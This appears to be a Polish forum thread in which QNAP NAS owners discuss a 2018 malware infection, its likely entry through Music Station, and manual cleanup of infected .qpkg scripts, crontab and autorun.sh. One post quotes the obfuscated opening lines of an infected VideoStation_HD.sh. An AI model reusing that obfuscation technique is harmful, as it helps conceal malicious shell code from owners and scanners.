Pomoc Malware i qnap

Dla mnie to o niczym nie świadczy. Profesjonalne wytwarzanie oprogramowania nie polega na wydawaniu wersji na kolanie.
Żartujesz? Jak dla mnie większym profesjonalizem wykazały się osoba/y które napisały ten malware - moje uwagi w poprzednich postach co do firmy qnap. Jeszcze jakby zamiast malware powstał ransomware to 'śmiechom' nie byłoby końca.
QNAP sobie dość swietnie radzi z ransomware oferując migawki.

I to wymaga przepisania całego systemu QTS i konkurencyjnych też. Jest to naprawde kłopotliwe i mówie tu z doswiadczenia programisty.
Ale w przyszłości będą podobne błędy. Może dzięki odseparowaniu uprawnień nieruszony (na pewno utrudiony) zostałby fw który jest w pamięci a co za tym idzie
postawienie wszystkiego na nowo rozwiązałoby problem. Aplikacje powinny działać z najmniejszymi możliwymi uprawnieniami
Container Station - Docker lub Wirtualizacja.

Wszystko to oferuje QNAP. To użytkownik decyduje z czego chce korzystać.

Słuchajcie żyjemy w czasach gdzie NSA/CIA ma specjalistów, którzy pisali "pendrive-owe" backdoory omijające Symanteca i inne softy, gdzie Microsoft oznajmił, że NSA wymusiło na nich udostępnienie kodu źródłowego ich systemu, gdzie Malware stał się popularny. Mamy ogromny problem w tych czasach, ale kiedyś przyjdzie rozwiązanie, jak nie ze strony programistów to z naszego rozsądku.
 
To nie zawsze tak jest. Backdoory są i zawsze bedą. Pamiętacie backdoor bash'a, samby i SSH?
Oczywiście, tego się nie uniknie. Można za to minimalizować ryzyko które aktualnie jest, posiadając jakiekolwiek dodatkowe narzędzie uruchomione i wystawione na świat.
 
Koledzy,

Nie wiem czy zauważyliście ale MusicStation w aktualizacji 5.1.3 i 5.2.0 (z dnia 09.20) Qnap twiedzi że usunął "security Issue" więc może załatali lukę.
Container Station - Docker lub Wirtualizacja.
Wszystko to oferuje QNAP. To użytkownik decyduje z czego chce korzystać.

A tutaj się zgadzam w 100%. Oddzielenie od warstwy sprzętu lub systemu macierzystego od warstwy aplikacji jest jednym z najlepszych metod zapobieganiu tego typu atakom. Idąc za przykładem można stawiać np. Open Stack'a (trochę hardcorowo).

Pytanie moje czy Qnap udostępnia kontenery z Music station lub innymi aplikacjami? Gdyby Music Station była konteneryzowana na systemie to nie mieli byśmy dzisiaj problemu z robakiem.
 
Powiedz mi do i w jakim celu uzywasz music station?

U mnie Qnap służy dla kilku osób, które muszą mieć proste i przejrzyste aplikacje - głównie zdjęcia i muzyka. Photo Station daje radę chociaż mam kilka uwag, natomiast z pośród Plex'a i Music Station niestety Plex nie sprostał wymaganiom ogółu - co nie znaczy też że MS jest cudowne.
 
Moj NAS 25.08 zostal zainfekowany.

Wirus zaszyfrowal mi pliki sh w nastepujacych katalogach:
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 FileStation_HD
drwxr-xr-x 3 admin administrators 4096 2018-08-25 08:59 JRE/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 MusicStation_HD/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 MyNAS/
drwxr-xr-x 11 admin administrators 4096 2018-08-25 08:59 NotesStation3/
drwxr-xr-x 5 admin administrators 4096 2018-08-25 08:59 PhotoExt/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 PhotoStation_HD/
drwxr-xr-x 7 admin administrators 4096 2018-08-25 08:59 Plex_Home_Theater/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:59 VideoStation_HD/

Masakra.
 
Mogę się mylić, ale: to nie plik został zaszyfrowany. Te krzaki to zaszyfrowany payload wirusa, a nie pliku.

Jeśli czujesz się na siłach - usuń uważnie krzaki z plików, i będzie ok.

Dodatkowo usuń podejrzane wpisy z crontab.

I wyczyść autorun.sh

:)
 
Pierwszy z brzegu plik:

[/share/CACHEDEV1_DATA/.qpkg/VideoStation_HD] # cat VideoStation_HD.sh
#!/bin/sh

unse${QGxgjGuEBrn}t
bu${bLdOSQeMFsT}i$'\x6c'tin${JmSQHQLEb}
eva${jdovJKnDFUyUq}l
tru$'\x65'${falgDjhkjobGZXp}${UVlcaaptUglG}
${LdKBpBQijOYbVL}t${zlTerQEixpK}e${wPKekGG}st
${pfQtXBMyvA}bu${xWQxMydAbVmeQcT}iltin
${slrnSTjQHugTqB}t$nPtwDiIBFVHTz$''yp${FFKiTAZGK}e
ev$MCWcPCkMSjHGsBI$''al


I tak dalej.

Jak dla mnie QNAP nie bedzie mial laty na to. Na reddicie pisza ze ichni helpdesk kazde flashowac i inicjowac qnapa od nowa. Nasz helpdesk kaze czekac. Co za profesjonalizm i komunikacja wewnatrz firmy....
@cajar autorun.sh odhaczylem aby nie uzywal.

Niestety wpisy z crontaba po usunieciu po restarcie pojawiaja sie ponownie.
 
Ja swojego NAS wyczyściłem w ten sposób że przeszukałem cały / w poszukiwaniu tego typu wpisoe, ręcznie to usunąłem i jest OK.

A support QNAP robi co momo w tej kwestii. Odkąd założyłem ostatni ticket w tej sprawie bardzo pozytywnie mnie zaskoczyli :)
 
Współpracą i nastawieniem na rozwiązanie problemu. Tam też pracują ludzie, robią co mogą żeby rozwiązać problem.

Wracając do meritum: jeśli wpisu cron pojawiają się ponownie to znaczy że nie wszystkie pliki .sh zostały wyczyszczone.
 
Skasowalem payloady z tych folderow. Usunalem wpisy z crontaba. Zobaczymy jaki bedzie efekt. Na innych forach pisali ze apache zostal podmieniony :-(
Lipa. Wpis w crontabie wrocil. Nie wiesz gdzie jeszcze te payloady moga byc oprocz autorun.sh, crontaba oraz plikow sh z .qpkg? @cajar
 
Przeszukaj cały katalog / pod kątem zawartości - tak znajdziesz pozostałe zainfekowane pliki.

I nie wiem czy założyłeś ticket w helpdesku, ale może dostaniesz wersje developerska malwsre removera.
 

Użytkownicy znaleźli tą stronę używając tych słów:

  1. Vu
  2. aktualizacja przez konsole